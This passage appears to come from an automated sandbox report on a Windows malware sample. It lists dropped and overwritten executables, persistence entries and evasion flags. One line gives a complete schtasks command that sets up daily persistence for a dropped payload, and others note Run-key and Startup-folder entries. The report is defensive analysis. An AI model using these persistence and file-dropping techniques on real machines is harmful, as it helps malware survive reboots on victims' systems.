                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
                      Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIF
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7z.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\AppVClient.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zG.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Juqmtmya.PIFJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFFile created: C:\Users\Public\Libraries\aymtmquJ.pifJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\alg.exeJump to dropped file

                      Boot Survival

                      Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
                      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
                      Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
                      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Juqmtmya

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_02E0AB1C
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
